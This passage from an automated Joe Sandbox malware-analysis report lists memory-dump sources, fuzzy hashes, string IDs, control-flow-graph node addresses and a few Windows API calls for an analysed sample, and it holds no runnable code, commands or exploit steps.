                                                                                                      • Snapshot File: hcaresult_2_2_35a90000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: 0^L5
                                                                                                      • API String ID: 0-3174228013
                                                                                                      • Opcode ID: bebf0ce099f593c61879b4fd31edd319412646a4fc2cb0d36fbaf62c9a931912
                                                                                                      • Instruction ID: 18b6eb064aeef96efa84bceba9376c3a454f7e72f4a356124c60cc702f014c51
                                                                                                      • Opcode Fuzzy Hash: bebf0ce099f593c61879b4fd31edd319412646a4fc2cb0d36fbaf62c9a931912
                                                                                                      • Instruction Fuzzy Hash: 0FA18375E012288FEB18CF6AC944BDDBBF2BF89300F14C0AAD809A7255DB745A85CF51
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.3944257966.0000000035A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 35A90000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_35a90000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: 0^L5
                                                                                                      • API String ID: 0-3174228013
                                                                                                      • Opcode ID: 255b9c65ff3163857357256fa0db5de9f75eab2efb4304fa9bf652c1b2eb34da
                                                                                                      • Instruction ID: dd224a11c289a57e0b860b9bd0d374b2534c86f65c771588e3e82294acbc308a
                                                                                                      • Opcode Fuzzy Hash: 255b9c65ff3163857357256fa0db5de9f75eab2efb4304fa9bf652c1b2eb34da
                                                                                                      • Instruction Fuzzy Hash: EFA181B4E052289FEB18CF6AC944BDDBBF2BF89300F14C0AAD409A7255DB745A85CF11
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.3944257966.0000000035A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 35A90000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_35a90000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: 0^L5
                                                                                                      • API String ID: 0-3174228013
                                                                                                      • Opcode ID: 1e37525412da1c34f7b85c31f082fbc722e1ea4004a9356ce731432497b9c49f
                                                                                                      • Instruction ID: f1c998400e8ad1ff66afb7dfb9d834e53f24dbab9c3d7a5970884513973cc3b3
                                                                                                      • Opcode Fuzzy Hash: 1e37525412da1c34f7b85c31f082fbc722e1ea4004a9356ce731432497b9c49f
                                                                                                      • Instruction Fuzzy Hash: C3A17375E012288FEB18CF6AC944BDDBBF2BF89300F14C1AAD809A7255DB745A85CF51
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.3944257966.0000000035A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 35A90000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_35a90000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: 0^L5
                                                                                                      • API String ID: 0-3174228013
                                                                                                      • Opcode ID: 94599f3151bdf0964cf11a6967da554e4a5f0e3d3aeb0c9bde650274fc3f54a6
                                                                                                      • Instruction ID: e96b26ec64f1974a74abbfa3771cc76372a32e61c0a45814f27e1c82b82338b5
                                                                                                      • Opcode Fuzzy Hash: 94599f3151bdf0964cf11a6967da554e4a5f0e3d3aeb0c9bde650274fc3f54a6
                                                                                                      • Instruction Fuzzy Hash: A17185B4D016288FEB68CF6AC944BDDBAF2BF89300F14C0AAD40DA7254DB345A85CF51
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.3944257966.0000000035A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 35A90000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_35a90000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 75e4fc9aed5a37239af4bc8eee0ad7c42c874e3e59c65d2431097d7391b0901d
                                                                                                      • Instruction ID: e8c9cacba1358c8998312f3352482e30054e34359599ccb1e965a6dc947afe0d
                                                                                                      • Opcode Fuzzy Hash: 75e4fc9aed5a37239af4bc8eee0ad7c42c874e3e59c65d2431097d7391b0901d
                                                                                                      • Instruction Fuzzy Hash: AC72CD74E052298FDB68DF69C980BD9BBF2BF49301F5481E9D809A7251DB349E82CF50
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.3943097874.00000000354B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 354B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_354b0000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 73b6358c1c8628ae5c674b47556363986a9afbaab834d0af5e73e74fb4cac07f
                                                                                                      • Instruction ID: b4dfe810acfe25614321492c7b486aba7e24d7904faf8e265323a28f4e8079ac
                                                                                                      • Opcode Fuzzy Hash: 73b6358c1c8628ae5c674b47556363986a9afbaab834d0af5e73e74fb4cac07f
                                                                                                      • Instruction Fuzzy Hash: B7E1CF74E01218CFDB14DFA5C994B9DBBB2BF49304F2081AAD449B73A1DB755A86CF20
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.3944257966.0000000035A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 35A90000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_35a90000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: cee365748c9b7179c1806279eeee0d5a343a8da9604850cd4c03bc30548bd8bc
                                                                                                      • Instruction ID: eb3d74f05f6a07db1f1105eb851a0e13e03d72e3dc97153ef09fe2a531f26e41
                                                                                                      • Opcode Fuzzy Hash: cee365748c9b7179c1806279eeee0d5a343a8da9604850cd4c03bc30548bd8bc
                                                                                                      • Instruction Fuzzy Hash: 49C19274E00258CFDB58DFA5C994B9DBBB2BF89300F1081A9D809AB365DB359D86CF50
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.3943097874.00000000354B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 354B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_354b0000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 7e14e383cc49406a7835b187ad9c503b8c6cff694726924117328cad08c69859
                                                                                                      • Instruction ID: b8154b703af662c1fab350a44e01a94f4e08a92d6dc607da1b019f9835719049
                                                                                                      • Opcode Fuzzy Hash: 7e14e383cc49406a7835b187ad9c503b8c6cff694726924117328cad08c69859
                                                                                                      • Instruction Fuzzy Hash: D1C18F74E00218CFDB54DFA5C994B9DBBB2BF88301F1085A9D809A73A5DB759E86CF10
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.3943097874.00000000354B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 354B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_354b0000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: f4101370fd5d55c053fd65fe8bf12c7fb27a3099de0c4544e8fa329f686e81e5
                                                                                                      • Instruction ID: 52f9607e8b5dc6abdf2ca5f706e7d14346c2b6a30b4065026d9fedc3e42904dd
                                                                                                      • Opcode Fuzzy Hash: f4101370fd5d55c053fd65fe8bf12c7fb27a3099de0c4544e8fa329f686e81e5
                                                                                                      • Instruction Fuzzy Hash: 2291F374A04208CFEB14DFA8C584BDCBBB1FF49311F20929AE449B7291DBB59985CF64
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.3944257966.0000000035A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 35A90000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_35a90000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: ca0ed763ce2260fab39b49a2921d73993494998b1f21be0b7808d4f45a0fccad
                                                                                                      • Instruction ID: c9c7be03d01d2d48bdbed9fe7f3b8c4d11f2fe81f4ae6b524629e83331823f19
                                                                                                      • Opcode Fuzzy Hash: ca0ed763ce2260fab39b49a2921d73993494998b1f21be0b7808d4f45a0fccad
                                                                                                      • Instruction Fuzzy Hash: 2A81E574E0525C8BDB08DFAAC990ADDBBF2BF88301F64C529D814BB395DB349942DB50
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.3944257966.0000000035A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 35A90000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_35a90000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 08b740b5a21e858089715cb804c16034c6cf7270f9afc667f75ba54080d29903
                                                                                                      • Instruction ID: 842fa4f6f305a3ad432f015fdc4d37c4dd0b2710ceb48df0f3244ec29c340778
                                                                                                      • Opcode Fuzzy Hash: 08b740b5a21e858089715cb804c16034c6cf7270f9afc667f75ba54080d29903
                                                                                                      • Instruction Fuzzy Hash: 99612C74A00258CFDB15EF65D954BADBBBAFF88300F1088AA980A77365CB355D86DF04
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.3944257966.0000000035A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 35A90000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_35a90000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 17eb9ef450effcca6f98c9ee28248d224ea7c94843d9606aaf30dc85691e4585
                                                                                                      • Instruction ID: f4192ac8c9fb47ddc3f434347a912c1f3acb1baaa9c83697ee179aae3568cf76
                                                                                                      • Opcode Fuzzy Hash: 17eb9ef450effcca6f98c9ee28248d224ea7c94843d9606aaf30dc85691e4585
                                                                                                      • Instruction Fuzzy Hash: 40415AB1D016189BEB58CF6BCD457CAFAF3AFC8304F04C1AAC50CA6264DB744A868F51
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.3944257966.0000000035A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 35A90000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_35a90000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 71d62ad40a60a519e453909f5a17a2743c378efc8c386a4e0b530e5cb25750f6
                                                                                                      • Instruction ID: 91d7b5f4dc438b4c985a7d0cfb2e75402b39a0ddc20a7ca843cf263495692167
                                                                                                      • Opcode Fuzzy Hash: 71d62ad40a60a519e453909f5a17a2743c378efc8c386a4e0b530e5cb25750f6
                                                                                                      • Instruction Fuzzy Hash: 9B410874E012488BEB08DFAAC540ADDFBF2BF89300F20D12AD419BB254DB345946CF50

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 0 1666b8-1666ed 1 1666f3-166716 0->1 2 166b1c-166b20 0->2 11 1667c4-1667c8 1->11 12 16671c-166729 1->12 3 166b22-166b36 2->3 4 166b39-166b47 2->4 9 166bb8-166bcd 4->9 10 166b49-166b5e 4->10 20 166bd4-166be1 9->20 21 166bcf-166bd2 9->21 22 166b65-166b72 10->22 23 166b60-166b63 10->23 13 166810-166819 11->13 14 1667ca-1667d8 11->14 28 16672b-166736 12->28 29 166738 12->29 17 166c2f 13->17 18 16681f-166829 13->18 14->13 36 1667da-1667f5 14->36 30 166c34-166c4d 17->30 18->2 26 16682f-166838 18->26 24 166be3-166c1e 20->24 21->24 25 166b74-166bb5 22->25 23->25 73 166c25-166c2c 24->73 34 166847-166853 26->34 35 16683a-16683f 26->35 31 16673a-16673c 28->31 29->31 31->11 37 166742-1667a4 31->37 34->30 40 166859-16685f 34->40 35->34 57 1667f7-166801 36->57 58 166803 36->58 84 1667a6 37->84 85 1667aa-1667c1 37->85 43 166b06-166b0a 40->43 44 166865-166875 40->44 43->17 47 166b10-166b16 43->47 55 166877-166887 44->55 56 166889-16688b 44->56 47->2 47->26 59 16688e-166894 55->59 56->59 60 166805-166807 57->60 58->60 59->43 61 16689a-1668a9 59->61 60->13 62 166809 60->62 68 166957-166982 call 166500 * 2 61->68 69 1668af 61->69 62->13 86 166a6c-166a86 68->86 87 166988-16698c 68->87 71 1668b2-1668c3 69->71 71->30 75 1668c9-1668db 71->75 75->30 77 1668e1-1668fb call 166c98 75->77 80 166901-166911 77->80 80->43 83 166917-16691a 80->83 88 166924-166927 83->88 89 16691c-166922 83->89 84->85 85->11 86->2 109 166a8c-166a90 86->109 87->43 91 166992-166996 87->91 88->17 92 16692d-166930 88->92 89->88 89->92 94 1669be-1669c4 91->94 95 166998-1669a5 91->95 96 166932-166936 92->96 97 166938-16693b 92->97 98 1669c6-1669ca 94->98 99 1669ff-166a05 94->99 112 1669a7-1669b2 95->112 113 1669b4 95->113 96->97 100 166941-166945 96->100 97->17 97->100 98->99 101 1669cc-1669d5 98->101 102 166a07-166a0b 99->102 103 166a11-166a17 99->103 100->17 106 16694b-166951 100->106 107 1669d7-1669dc 101->107 108 1669e4-1669fa 101->108 102->73 102->103 110 166a23-166a25 103->110 111 166a19-166a1d 103->111 106->68 106->71 107->108 108->43 115 166a92-166a9c call 1653a8 109->115 116 166acc-166ad0 109->116 117 166a27-166a30 110->117 118 166a5a-166a5c 110->118 111->43 111->110 114 1669b6-1669b8 112->114 113->114 114->43 114->94 115->116 129 166a9e-166ab3 115->129 116->73 121 166ad6-166ada 116->121 124 166a32-166a37 117->124 125 166a3f-166a55 117->125 118->43 119 166a62-166a69 118->119 121->73 126 166ae0-166aed 121->126 124->125 125->43 132 166aef-166afa 126->132 133 166afc 126->133 129->116 137 166ab5-166aca 129->137 134 166afe-166b00 132->134 133->134 134->43 134->73 137->2 137->116
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.3920420620.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_160000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: (o]q$(o]q$(o]q$(o]q$(o]q$(o]q$,aq$,aq
                                                                                                      • API String ID: 0-1435242062
                                                                                                      • Opcode ID: a9c780b96feb54b093459d2525978944327c39620b064328853d26195964ef75
                                                                                                      • Instruction ID: 9a8e2356672f1088a391f5fc8312f1dba31c7e7483d8e50387973a427ce335ce
                                                                                                      • Opcode Fuzzy Hash: a9c780b96feb54b093459d2525978944327c39620b064328853d26195964ef75
                                                                                                      • Instruction Fuzzy Hash: E6127D30A00609DFCB14CF69D984AAEBBF6FF88314F158569E849EB265DB30ED51CB50

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 141 1619b8-161a13 145 161a35-161a84 141->145 146 161a15-161a34 141->146 150 161a86-161a8d 145->150 151 161a9f 145->151 152 161a96-161a9d 150->152 153 161a8f-161a94 150->153 155 161aa7 151->155 154 161aaa-161abe 152->154 153->154 157 161ad4-161adc 154->157 158 161ac0-161ac7 154->158 155->154 161 161ade-161ae2 157->161 159 161acd-161ad2 158->159 160 161ac9-161acb 158->160 159->161 160->161 163 161ae4-161af9 161->163 164 161b42-161b45 161->164 163->164 170 161afb-161afe 163->170 165 161b47-161b5c 164->165 166 161b8d-161b93 164->166 165->166 173 161b5e-161b62 165->173 168 16268e 166->168 169 161b99-161b9b 166->169 176 162693-162ca1 168->176 169->168 171 161ba1-161ba6 169->171 174 161b00-161b02 170->174 175 161b1d-161b3b call 1602a8 170->175 177 16263c-162640 171->177 178 161bac 171->178 179 161b64-161b68 173->179 180 161b6a-161b88 call 1602a8 173->180 174->175 181 161b04-161b07 174->181 175->164 201 162cb2-162cba 176->201 202 162ca3-162ca5 176->202 183 162647-16268d 177->183 184 162642-162645 177->184 178->177 179->166 179->180 180->166 181->164 186 161b09-161b1b 181->186 184->176 184->183 186->164 186->175 205 162cbc-162cca 201->205 203 162ca7-162ca9 202->203 204 162cab-162cb0 202->204 203->205 204->205 208 162ce0-162ce8 205->208 209 162ccc-162cce 205->209 212 162ceb-162cee 208->212 210 162cd7-162cde 209->210 211 162cd0-162cd5 209->211 210->212 211->212 214 162d05-162d09 212->214 215 162cf0-162cfe 212->215 216 162d22-162d25 214->216 217 162d0b-162d19 214->217 215->214 221 162d00 215->221 219 162d27-162d2b 216->219 220 162d2d-162d62 216->220 217->216 227 162d1b 217->227 219->220 223 162d64-162d7b 219->223 228 162dc4-162dc9 220->228 221->214 225 162d81-162d8d 223->225 226 162d7d-162d7f 223->226 229 162d97-162da1 225->229 230 162d8f-162d95 225->230 226->228 227->216 232 162da9 229->232 233 162da3 229->233 230->232 234 162db1-162dbd 232->234 233->232 234->228
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.3920420620.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_160000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: Xaq$Xaq$Xaq$Xaq$Xaq$Xaq
                                                                                                      • API String ID: 0-499371476
                                                                                                      • Opcode ID: 9bca9c6fb7c30bb3cccb2f8dfcb0fce47b46616cefc2358c11cc9bd89141bcf5
                                                                                                      • Instruction ID: 4b71dd13f10286f80fed18a5fe5efc0aebe8ae1029f83769bd249a8b831c5932
                                                                                                      • Opcode Fuzzy Hash: 9bca9c6fb7c30bb3cccb2f8dfcb0fce47b46616cefc2358c11cc9bd89141bcf5
                                                                                                      • Instruction Fuzzy Hash: 00724D2960D3D29FDB264F305CFB595BFE09E4314476D0ADEE0C1660A3DAA987A9C313

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 692 35df0970-35df0a0f GetCurrentProcess 697 35df0a18-35df0a4c GetCurrentThread 692->697 698 35df0a11-35df0a17 692->698 699 35df0a4e-35df0a54 697->699 700 35df0a55-35df0a89 GetCurrentProcess 697->700 698->697 699->700 702 35df0a8b-35df0a91 700->702 703 35df0a92-35df0aaa 700->703 702->703 714 35df0aad call 35df0b4f 703->714 715 35df0aad call 35df0f31 703->715 706 35df0ab3-35df0ae2 GetCurrentThreadId 707 35df0aeb-35df0b4d 706->707 708 35df0ae4-35df0aea 706->708 708->707 714->706 715->706
                                                                                                      APIs
                                                                                                      • GetCurrentProcess.KERNEL32 ref: 35DF09FE
                                                                                                      • GetCurrentThread.KERNEL32 ref: 35DF0A3B
                                                                                                      • GetCurrentProcess.KERNEL32 ref: 35DF0A78
                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 35DF0AD1
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.3944389815.0000000035DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35DF0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_35df0000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Current$ProcessThread
                                                                                                      • String ID:
                                                                                                      • API String ID: 2063062207-0
                                                                                                      • Opcode ID: 22826fa2eac0ee61bf7c1bb099ddd4d0f3efa23cc51748148122bd2e2ed1a753
                                                                                                      • Instruction ID: f8284a1b675e83577405768de3b0f2179aa040f161fb4bf46719c028e5f5269c
                                                                                                      • Opcode Fuzzy Hash: 22826fa2eac0ee61bf7c1bb099ddd4d0f3efa23cc51748148122bd2e2ed1a753
                                                                                                      • Instruction Fuzzy Hash: 175146B49012499FDB08DFA9D548BEEBBF1FF89300F208459D40AB7360D739A940CB65

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 716 35df0980-35df0a0f GetCurrentProcess 720 35df0a18-35df0a4c GetCurrentThread 716->720 721 35df0a11-35df0a17 716->721 722 35df0a4e-35df0a54 720->722 723 35df0a55-35df0a89 GetCurrentProcess 720->723 721->720 722->723 725 35df0a8b-35df0a91 723->725 726 35df0a92-35df0aaa 723->726 725->726 737 35df0aad call 35df0b4f 726->737 738 35df0aad call 35df0f31 726->738 729 35df0ab3-35df0ae2 GetCurrentThreadId 730 35df0aeb-35df0b4d 729->730 731 35df0ae4-35df0aea 729->731 731->730 737->729 738->729
                                                                                                      APIs
                                                                                                      • GetCurrentProcess.KERNEL32 ref: 35DF09FE
                                                                                                      • GetCurrentThread.KERNEL32 ref: 35DF0A3B
                                                                                                      • GetCurrentProcess.KERNEL32 ref: 35DF0A78
                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 35DF0AD1
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.3944389815.0000000035DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35DF0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_35df0000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Current$ProcessThread
                                                                                                      • String ID:
                                                                                                      • API String ID: 2063062207-0
                                                                                                      • Opcode ID: 6738d217de89e10b09cda58e4e752297f108b7caedac5b93c0b67a784447332d
                                                                                                      • Instruction ID: 92d226543db2f3ece6c0f53ec737016ddd00a9908a61888d687eca15c26adb33
                                                                                                      • Opcode Fuzzy Hash: 6738d217de89e10b09cda58e4e752297f108b7caedac5b93c0b67a784447332d
                                                                                                      • Instruction Fuzzy Hash: 615136B49012499FDB08DFA9D548BEEBBF5FF89300F208459D41AA7360DB39A940CF65

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 928 35a9d548-35a9d66d 947 35a9d710-35a9d741 928->947 948 35a9d673-35a9d6b9 928->948 955 35a9d747-35a9d75e 947->955 953 35a9d6bb-35a9d6bf 948->953 954 35a9d6c4-35a9d70f 948->954 953->954
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.3944257966.0000000035A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 35A90000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_35a90000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: 4']q$4']q$drL5
                                                                                                      • API String ID: 0-2837428152
                                                                                                      • Opcode ID: d47f94c3c85f4595021d9a4a3086ebdd86a85db8d0cb65e5c752d0a1058c638d
                                                                                                      • Instruction ID: 1eedc68fc8a0ea364b0a67f8534a188dfaea61b99280d6be0c0bc975abaa6ac7
                                                                                                      • Opcode Fuzzy Hash: d47f94c3c85f4595021d9a4a3086ebdd86a85db8d0cb65e5c752d0a1058c638d
                                                                                                      • Instruction Fuzzy Hash: 26516370A001499FCB09EFA8D5519DEBBF1FF85300F1085A5D045BB266DB35AD46CF91

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 963 35a97920-35a97941 964 35a97948-35a9797e 963->964 965 35a97943 963->965 968 35a97987-35a979ae 964->968 965->964 970 35a97b3d-35a97b46 968->970 971 35a979b4-35a979cc 968->971 974 35a97ae8-35a97b03 971->974 976 35a97b09-35a97b2d 974->976 977 35a979d1-35a97ae7 974->977 976->970 977->974
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.3944257966.0000000035A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 35A90000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_35a90000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: <CL5$<CL5$<CL5
                                                                                                      • API String ID: 0-875145483
                                                                                                      • Opcode ID: 8e0751c6f2ca65bf26c187293f237728e5227c2e8c0ab4e7c332a24a92d66815
                                                                                                      • Instruction ID: 7afbfc2fef1a1855672c22e2fad3d2234bd85cbfcca796afcfce61178927f09e
                                                                                                      • Opcode Fuzzy Hash: 8e0751c6f2ca65bf26c187293f237728e5227c2e8c0ab4e7c332a24a92d66815
                                                                                                      • Instruction Fuzzy Hash: 45513374E01318DFDB18DFA5D944AAEBBB2FF89301F208529D80AAB365DB355946CF40

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 1431 164f00-164f22 1432 164f24-164f28 1431->1432 1433 164f38-164f43 1431->1433 1434 164f50-164f57 1432->1434 1435 164f2a-164f36 1432->1435 1436 164feb-165017 1433->1436 1437 164f49-164f4b 1433->1437 1438 164f77-164f80 1434->1438 1439 164f59-164f60 1434->1439 1435->1433 1435->1434 1444 16501e-165076 1436->1444 1440 164fe3-164fe8 1437->1440 1535 164f82 call 164ef0 1438->1535 1536 164f82 call 164f00 1438->1536 1439->1438 1441 164f62-164f6d 1439->1441 1443 164f73-164f75 1441->1443 1441->1444 1443->1440 1463 165085-165097 1444->1463 1464 165078-16507e 1444->1464 1445 164f88-164f8a 1446 164f92-164f9a 1445->1446 1447 164f8c-164f90 1445->1447 1450 164f9c-164fa1 1446->1450 1451 164fa9-164fab 1446->1451 1447->1446 1449 164fad-164fcc 1447->1449 1457 164fe1 1449->1457 1458 164fce-164fd7 1449->1458 1450->1451 1451->1440 1457->1440 1533 164fd9 call 169eb0 1458->1533 1534 164fd9 call 169f6d 1458->1534 1460 164fdf 1460->1440 1466 16509d-1650a1 1463->1466 1467 16512b-16512f call 1652c8 1463->1467 1464->1463 1468 1650a3-1650af 1466->1468 1469 1650b1-1650be 1466->1469 1470 165135-16513b 1467->1470 1475 1650c0-1650ca 1468->1475 1469->1475 1473 165147-16514e 1470->1473 1474 16513d-165143 1470->1474 1476 165145 1474->1476 1477 1651a9-165208 1474->1477 1480 1650f7-1650fb 1475->1480 1481 1650cc-1650db 1475->1481 1476->1473 1490 16520f-165233 1477->1490 1482 165107-16510b 1480->1482 1483 1650fd-165103 1480->1483 1492 1650dd-1650e4 1481->1492 1493 1650eb-1650f5 1481->1493 1482->1473 1487 16510d-165111 1482->1487 1485 165105 1483->1485 1486 165151-1651a2 1483->1486 1485->1473 1486->1477 1489 165117-165129 1487->1489 1487->1490 1489->1473 1500 165235-165237 1490->1500 1501 165239-16523b 1490->1501 1492->1493 1493->1480 1502 1652b1-1652b4 1500->1502 1503 16524c-16524e 1501->1503 1504 16523d-165241 1501->1504 1510 165250-165254 1503->1510 1511 165261-165267 1503->1511 1508 165247-16524a 1504->1508 1509 165243-165245 1504->1509 1508->1502 1509->1502 1512 165256-165258 1510->1512 1513 16525a-16525f 1510->1513 1515 165292-165294 1511->1515 1516 165269-165290 1511->1516 1512->1502 1513->1502 1519 16529b-16529d 1515->1519 1516->1519 1522 1652a3-1652a5 1519->1522 1523 16529f-1652a1 1519->1523 1525 1652a7-1652ac 1522->1525 1526 1652ae 1522->1526 1523->1502 1525->1502 1526->1502 1533->1460 1534->1460 1535->1445 1536->1445
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.3920420620.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_160000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: Haq$Haq
                                                                                                      • API String ID: 0-4016896955
                                                                                                      • Opcode ID: f38a2accf9ad94bec976c8e3dbdeac45ca715ff0bd1592d3e5d072e57246dc10
                                                                                                      • Instruction ID: 2dd80cea8bd8513598f3400f0b909c55bcaaaf35bef275f5f460d8bb5c98e786
                                                                                                      • Opcode Fuzzy Hash: f38a2accf9ad94bec976c8e3dbdeac45ca715ff0bd1592d3e5d072e57246dc10
                                                                                                      • Instruction Fuzzy Hash: DBB1D0343046518FCB199F38CC98B6A7BE7AF89304F158569E846CB3A5CB34CD92DB91

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
